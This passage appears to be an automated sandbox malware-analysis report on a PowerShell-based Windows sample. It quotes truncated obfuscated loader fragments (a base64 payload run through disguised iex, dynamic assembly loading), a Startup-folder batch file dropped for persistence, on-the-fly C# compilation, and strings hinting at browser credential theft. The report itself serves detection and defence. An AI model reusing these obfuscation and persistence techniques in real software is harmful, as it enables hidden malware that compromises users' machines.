      Source: Binary string: nullMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewyMicrosoft.Windows.PinningConfirmationDialog_cw5n1h2txyewyMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewyMicrosoft.Windows.ShellExperienceHost_cw5n1h2txyewyMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewymicrosoft.windowscommunicationsapps_8wekyb3d8bbwepwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].jspwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7[1].csspwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].jspwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7[1].jspwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7[1].css02d10d8f3b2550b1ef1c26446560bb701c8a38270558a230195db09392dbb20737529a6a49f2e46ad168f26e3c5c8a65cea482941a8b4b39108838bfb5ecefe63783e7d9aee4122ca0a40a8f1a32a54ec18e6f61ac6fe1ddb07b3a4d2bb898aa4d37196bc735aaeee1b7479ffd7be02fd8efaaa4175d538e592c451486a1643c6694292562b8278f722fccadbe11f33bd66a4e3eb075a2783d9a5c573673809970ff3d4a131ad5bd7be00ef0175c91a5db687ae5ad4c96d06a69d2085a72ec4c74a3fd35b829e52e6ca53adb996dd9ebc370f7d1d5f6ad09308d8fbfac3ef4548d34928b03e6d4fbfd13da0e2521462d4a4fc68446f101ed58b669e3dada662c921ae2be6f2c0c4f5d0612de464ac6be9b75354010d4c8c367cf25fe0bff1b169511e5e0a9d328dc1aceabc9e9eef27035aa872d65a5e2a1f519204e75e017e6ac72f8d729696026187dd059d2d97c4cab419d349e745057c40f173d46ed66a2c4d0028eef040a7ffac470afe683d9cdcc1cbec1a0a32156f64ec8d93ea2b3bdc828b5bcb9f7a25ab4d404f1bf5eee3b4351a8a0f27bb835216d17deee2fafd5df0d0984d439371960407f90ea85fb0ccfd3c500d5bb9a55eb375305d2a3b0e3C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\C:\Users\user\AppData\Local\SolidDocumentsC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_435825870\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_492380506\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_529259725\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_600014076\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_669696935\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_677372717\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_719535175\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_867342333\C:\Users\user\AppData\Local\Temp\scoped_dir10952_1826612563C:\Users\user\AppData\Local\Temp\scoped_dir10952_1826612563C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\C:\Users\user\AppData\Local\Temporary Internet FilesC:\Users\user\AppData\Local\VirtualStoreC:\Users\user\AppData\Local\_curlrc*struct { EncryptedKey string "json:\"encrypted_key\"" }a\8*struct { EncryptedKey string "json:\"encrypted_key\"" }HARDWARE_ACCELERATION_MODE_PREVIOUSVARIATIONS_FAILED_TO_FETCH_SEED_STREAKVARIATIONS_PERMANENT_CONSISTENCY_COUNTRYVARIATIONS_SAFE_SEED_PERMANENT_CONSISTENCY_COUNTRYVARIATIONS_SAFE_SEED_SESSION_CONSISTENCY_COUNTRY source: powershell.exe, 00000022.00000002.180124265
      Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdbhP source: powershell.exe, 0000001F.00000002.1614835648.000002B3C127F000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: URLVISIT_COUNTnullnullnullnullroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTemproaming.locksettings.datINetCacheINetCookiesINetHistoryINetCacheTempINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateACAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryINetCacheTempINetCookiesINetHistory8wekyb3d8bbweFontsLicensesAcrobat.ses0013461513Low01647711900196354653040965466404501253020518291756064944428106536719410686412204098239075810338682561141274626120633745912371609431239919175142233959916702910371809927897192799467021039543132118371548212936081621624033982168651637223875848123857605532567238426258555860126690497522760101248284330786328925102383118691078332260465334768886793554373729364339976036455030003761760476428928852843199088814478492829461873262646760122344736274156496536702450640779625089483566512062693552811040335449697240549163071858091303015911976538618321158962136532766326573906632922725663327833706577738837663680599267300306057059748165721680495672418139447246058026730071234273748340687457734050746334954576766874417847944919793717792482009465368272948061835180110584856683818552718761857640496089750658019048275495921702144793292380079422479677965969216199254781479973218975acrobat_sbxacrocef_lowAdobeARM.logchrome.execv_debug.logdbghelp.dllDiagnosticsjusched.logofflineSymbolssymsrv.dllEXCELtmpB263.tmpwct228B.tmpwct4054.tmpwct7120.tmpwctB366.tmpwctDE6E.tmpwmsetup.logdownload.errorntkrnlmp.pdbdownload.errorwinload_prod.pdbacroNGLLog.txtAdobeNGLAcrobatDCAdobeAcrobatDCSearchEmbdIndex000003.logCURRENTLOCKLOGLOG.oldCURRENTMANIFEST-000001000003.logLOCKLOGLOG.oldMANIFEST-00000109AZ09AZ09AZdQw4!# source: powershell.exe, 00000022.00000002.1801242655.000000C000006000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly($name, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $module = $assembly.DefineDynamicModule('DynamicModule') $typeBuilder = $module.DefineType('PInvokeType', 'Publi
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("JGtlbWF0aWFuLlNldFZhbHVlKCRudWxsLCR0cnVlKQ==")) | &([regex]::Unescape("\u0069\u0065\u0078")) ([Reflection.Assembly]::LoadWithPartialName(('System.Core')).GetType(('System.Diagnost
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC62794A push ebx; retf 12_2_00007FFAAC62796A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC5000BD pushad ; iretd 31_2_00007FFAAC5000C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC5100BD pushad ; iretd 34_2_00007FFAAC5100C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC519B90 push eax; retf 34_2_00007FFAAC519B99
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC51407E push eax; iretd 34_2_00007FFAAC51408D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC51406A pushad ; iretd 34_2_00007FFAAC51407D
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.dllJump to dropped file

      Boot Survival

      barindex
      Drops script or batch files to the startup folder
      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.batJump to dropped file
      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.batJump to behavior
      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.batJump to behavior
      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat\:Zone.Identifier:$DATAJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
